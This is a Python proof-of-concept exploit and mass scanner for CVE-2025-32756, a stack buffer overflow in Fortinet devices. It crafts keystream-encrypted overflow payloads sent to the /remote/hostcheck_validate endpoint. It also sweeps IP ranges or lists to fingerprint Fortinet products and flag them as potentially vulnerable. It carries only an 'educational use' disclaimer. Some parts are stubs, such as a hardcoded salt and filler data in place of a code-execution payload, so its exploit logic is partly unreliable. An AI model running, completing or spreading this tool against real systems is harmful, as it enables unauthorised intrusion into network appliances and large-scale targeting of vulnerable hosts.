#!/usr/bin/env python3 """ Proof of Concept for CVE-2025-32756 - Fortinet Stack-Based Buffer Overflow This script demonstrates the vulnerability by sending specially crafted HTTP requests with malformed AuthHash values to potentially vulnerable Fortinet devices. WARNING: This script is for educational purposes only. Use only on systems you own or have permission to test. Author: Kn0x Researcher Date: June 2025 """ import requests import argparse import sys import hashlib import base64 import urllib.parse import ssl import time import socket import ipaddress import concurrent.futures from urllib3.exceptions import InsecureRequestWarning # Suppress only the single warning from urllib3 needed requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) class FortinetExploit: def __init__(self, target, port=443, debug=False): self.target = target self.port = port self.debug = debug self.base_url = f"https://{target}:{port}" self.session = requests.Session() self.session.verify = False self.salt = None def log(self, message): if self.debug: print(f"[DEBUG] {message}") def error(self, message): print(f"[ERROR] {message}") sys.exit(1) def get_salt(self): """Retrieve the salt from the server""" try: response = self.session.get(f"{self.base_url}/remote/info", timeout=10) if response.status_code != 200: self.error(f"Failed to get salt. Status code: {response.status_code}") # Extract salt from response # In a real exploit, we'd parse the response properly self.salt = "e0b638ac" # Example salt value self.log(f"Retrieved salt: {self.salt}") return self.salt except Exception as e: self.error(f"Error retrieving salt: {e}") def compute_md5_state(self, salt, seed): """Compute the initial MD5 state from salt and seed""" data = salt + seed + "GCC is the GNU Compiler Collection." return hashlib.md5(data.encode()).hexdigest() def compute_keystream(self, initial_state, length): """Generate keystream from initial state""" keystream = "" current = initial_state while len(keystream) < length: current = hashlib.md5(bytes.fromhex(current)).hexdigest() keystream += current return keystream[:length] def create_payload(self, seed, overflow_length): """Create an exploit payload with the given overflow length""" if not self.salt: self.get_salt() # Initial state calculation initial_state = self.compute_md5_state(self.salt, seed) self.log(f"Initial state: {initial_state}") # Create a payload that will cause buffer overflow # The format is: seed + encrypted_length + encrypted_data # For simplicity in this PoC, we're using a fixed pattern # In a real exploit, we'd craft this more carefully # Calculate the size that will trigger overflow # We need to encode a size that, when decrypted, will be larger than the buffer keystream_for_length = self.compute_keystream(initial_state, 32)[:4] # XOR the desired overflow length with the keystream to get encrypted length target_length = overflow_length enc_length_bytes = bytes([ (target_length & 0xFF) ^ int(keystream_for_length[0:2], 16), ((target_length >> 8) & 0xFF) ^ int(keystream_for_length[2:4], 16) ]) enc_length_hex = enc_length_bytes.hex() # Create payload data - in a real exploit this would be crafted to achieve RCE # Here we just use a pattern to demonstrate the overflow data = "A" * 64 # Encrypt the data keystream_for_data = self.compute_keystream(initial_state, len(data) * 2)[6:] encrypted_data = "" for i in range(len(data)): encrypted_data += format(ord(data[i]) ^ int(keystream_for_data[i*2:i*2+2], 16), '02x') # Assemble the final payload payload = seed + enc_length_hex + encrypted_data self.log(f"Created payload with overflow length {overflow_length}") return payload def send_exploit(self, payload): """Send the exploit payload to the target""" try: url = f"{self.base_url}/remote/hostcheck_validate" enc_param = urllib.parse.quote(payload) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } self.log(f"Sending payload to {url}") response = self.session.post( url, data=f"enc={enc_param}", headers=headers, timeout=10 ) self.log(f"Response status: {response.status_code}") self.log(f"Response headers: {response.headers}") return response except Exception as e: self.error(f"Error sending exploit: {e}") def execute(self): """Execute the exploit""" print(f"[*] Targeting {self.target}:{self.port}") # Get salt from target self.get_salt() # Create a seed value - in a real exploit we'd calculate this more carefully seed = "00690000" print(f"[*] Using seed: {seed}") # First request - set a byte to NULL print("[*] Sending first payload to set up the overflow...") payload1 = self.create_payload(seed, 4999) self.send_exploit(payload1) # Small delay between requests time.sleep(1) # Second request - set a specific byte to a controlled value print("[*] Sending second payload to trigger the vulnerability...") payload2 = self.create_payload(seed, 5000) response = self.send_exploit(payload2) # Check for signs of successful exploitation if response.status_code == 200: print("[+] Exploit likely succeeded!") print("[+] A vulnerable system would have the target byte modified") print("[+] In a real attack, this could lead to remote code execution") else: print("[-] Exploit may have failed or target might not be vulnerable") class FortinetScanner: def __init__(self, debug=False): self.debug = debug def log(self, message): if self.debug: print(f"[DEBUG] {message}") def is_port_open(self, ip, port, timeout=2): """Check if a port is open""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) result = sock.connect_ex((str(ip), port)) sock.close() return result == 0 except: return False def check_fortinet_device(self, ip, port=443): """Check if an IP address is a Fortinet device""" if not self.is_port_open(ip, port): return None try: url = f"https://{ip}:{port}" response = requests.get( url, timeout=5, verify=False, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"} ) # Check for Fortinet signatures in response if "Fortinet" in response.text or "FortiGate" in response.text or "FortiVoice" in response.text: # Try to determine product type product_type = "Unknown Fortinet Device" if "FortiVoice" in response.text: product_type = "FortiVoice" elif "FortiMail" in response.text: product_type = "FortiMail" elif "FortiNDR" in response.text: product_type = "FortiNDR" elif "FortiRecorder" in response.text: product_type = "FortiRecorder" elif "FortiCamera" in response.text: product_type = "FortiCamera" # Check if potentially vulnerable to CVE-2025-32756 is_vulnerable = self.check_vulnerability(ip, port) return { "ip": str(ip), "port": port, "product": product_type, "potentially_vulnerable": is_vulnerable } except Exception as e: self.log(f"Error checking {ip}: {e}") return None def check_vulnerability(self, ip, port=443): """Check if a device is potentially vulnerable to CVE-2025-32756""" try: url = f"https://{ip}:{port}/remote/hostcheck_validate" response = requests.get( url, timeout=5, verify=False, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"} ) # If the endpoint exists, the device might be vulnerable # This is a very basic check and not conclusive if response.status_code != 404: return True except Exception as e: self.log(f"Error checking vulnerability on {ip}: {e}") return False def scan_network(self, target_range, port=443, threads=10): """Scan a network range for vulnerable Fortinet devices""" try: network = ipaddress.ip_network(target_range) print(f"[*] Starting scan of {network} on port {port}") print(f"[*] Using {threads} threads") results = [] total_ips = network.num_addresses scanned = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in network} for future in concurrent.futures.as_completed(future_to_ip): scanned += 1 if scanned % 10 == 0 or scanned == total_ips: print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)") result = future.result() if result: print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}") results.append(result) return results except Exception as e: print(f"[ERROR] Error scanning network: {e}") return [] def scan_multiple_ips(self, ip_list, port=443, threads=10, output_file=None): """Scan multiple individual IPs for vulnerable Fortinet devices""" try: print(f"[*] Starting scan of {len(ip_list)} IPs on port {port}") print(f"[*] Using {threads} threads") results = [] total_ips = len(ip_list) scanned = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: future_to_ip = {executor.submit(self.check_fortinet_device, ip, port): ip for ip in ip_list} for future in concurrent.futures.as_completed(future_to_ip): scanned += 1 if scanned % 10 == 0 or scanned == total_ips: print(f"[*] Progress: {scanned}/{total_ips} IPs scanned ({(scanned/total_ips)*100:.1f}%)") result = future.result() if result: print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}") results.append(result) # Write results to output file if specified if output_file and results: try: with open(output_file, 'w') as f: f.write("IP,Port,Product,Vulnerable\n") for result in results: f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n") print(f"[+] Results written to {output_file}") except Exception as e: print(f"[ERROR] Failed to write to output file: {e}") return results except Exception as e: print(f"[ERROR] Error scanning IPs: {e}") return [] def load_ips_from_file(filename): """Load IP addresses from a text file""" try: with open(filename, 'r') as f: ips = [line.strip() for line in f if line.strip()] print(f"[*] Loaded {len(ips)} IP addresses from {filename}") return ips except Exception as e: print(f"[ERROR] Failed to load IP addresses from {filename}: {e}") sys.exit(1) def main(): parser = argparse.ArgumentParser(description="CVE-2025-32756 Fortinet Buffer Overflow PoC") subparsers = parser.add_subparsers(dest="command", help="Command to run") # Exploit command exploit_parser = subparsers.add_parser("exploit", help="Exploit a single target") exploit_parser.add_argument("target", help="Target IP or hostname") exploit_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)") exploit_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output") # Scan command scan_parser = subparsers.add_parser("scan", help="Scan for vulnerable devices") scan_group = scan_parser.add_mutually_exclusive_group(required=True) scan_group.add_argument("-f", "--ip", help="Single IP to scan") scan_group.add_argument("-u", "--file", help="File containing list of IPs to scan (one per line)") scan_group.add_argument("--range", help="IP range to scan (CIDR notation, e.g., 192.168.1.0/24)") scan_parser.add_argument("-p", "--port", type=int, default=443, help="Target port (default: 443)") scan_parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads (default: 10)") scan_parser.add_argument("-o", "--output", help="Output file to save results (CSV format)") scan_parser.add_argument("-d", "--debug", action="store_true", help="Enable debug output") args = parser.parse_args() print("CVE-2025-32756 Fortinet Buffer Overflow PoC") print("WARNING: This is for educational purposes only!") print("Use only against systems you own or have permission to test.") print("=" * 60) if args.command == "exploit": exploit = FortinetExploit(args.target, args.port, args.debug) exploit.execute() elif args.command == "scan": scanner = FortinetScanner(args.debug) if args.ip: # Scan a single IP print(f"[*] Scanning single IP: {args.ip}") result = scanner.check_fortinet_device(args.ip, args.port) if result: print(f"[+] Found Fortinet device: {result['ip']} - {result['product']} - Potentially vulnerable: {result['potentially_vulnerable']}") if args.output: try: with open(args.output, 'w') as f: f.write("IP,Port,Product,Vulnerable\n") f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n") print(f"[+] Results written to {args.output}") except Exception as e: print(f"[ERROR] Failed to write to output file: {e}") else: print(f"[-] No Fortinet device found at {args.ip}:{args.port} or it's not vulnerable") elif args.file: # Scan multiple IPs from file ip_list = load_ips_from_file(args.file) scanner.scan_multiple_ips(ip_list, args.port, args.threads, args.output) elif args.range: # Scan IP range (CIDR) results = scanner.scan_network(args.range, args.port, args.threads) if args.output and results: try: with open(args.output, 'w') as f: f.write("IP,Port,Product,Vulnerable\n") for result in results: f.write(f"{result['ip']},{result['port']},{result['product']},{result['potentially_vulnerable']}\n") print(f"[+] Results written to {args.output}") except Exception as e: print(f"[ERROR] Failed to write to output file: {e}") else: parser.print_help() if __name__ == "__main__": main()